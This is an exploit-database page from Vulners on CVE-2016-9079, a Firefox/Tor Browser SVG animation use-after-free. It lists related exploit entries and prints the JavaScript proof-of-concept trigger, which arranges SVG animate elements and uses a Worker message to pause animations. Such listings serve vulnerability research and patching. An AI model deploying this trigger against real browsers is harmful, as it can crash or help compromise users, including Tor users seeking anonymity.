Vulners
Lucene search
New Firefox/Tor Browser 0-day vulnerability (CVE-2016-9079)
| Reporter | Title | Published | Views | Family All 152 |
|---|---|---|---|---|
 | Mozilla Firefox nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution Exploit | 24 Jan 201700:00 | – | zdt |
| Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit | 15 Jul 201700:00 | – | zdt |
| Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution Exploit | 17 Mar 201800:00 | – | zdt |
| Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit | 17 Mar 201800:00 | – | zdt |
 | Mozilla -- SVG Animation Remote Code Execution | 30 Nov 201600:00 | – | freebsd |
 | Exploit for Use After Free in Debian Debian_Linux | 29 Jul 201812:55 | – | githubexploit |
 | Security Bulletin: Mozilla Firefox vulnerability issues in IBM SONAS | 18 Jun 201800:32 | – | ibm |
| Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified. | 18 Jun 201800:32 | – | ibm |
 | Mozilla Firefox < 50.0.2 RCE | 5 Jan 201700:00 | – | nessus |
| Mozilla Firefox ESR < 45.5.1 RCE | 5 Jan 201700:00 | – | nessus |
10
<!-- 相关版本poc可在此下载 https://bugzilla.mozilla.org/show_bug.cgi?id=1321066 -->
<!-- 来自 [tor-talk] 可在此下载:https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html,可被用来攻击利用 Tor 浏览器使用的 Firefox版本 -->
<script>
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
worker.postMessage("zero");
var svgns = 'http://www.w3.org/2000/svg';
worker.onmessage = function(e) {containerA.pauseAnimations();}
var craftDOM = function()
{
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');
animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')
var animateC = document.createElementNS(svgns, 'animate')
var idA = "ia";
var idC = "ic";
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('end', idA + '.end');
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)
containerB.appendChild(animateC)
document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
window.onload = craftDOM;
</script>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Nov 2016 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.87921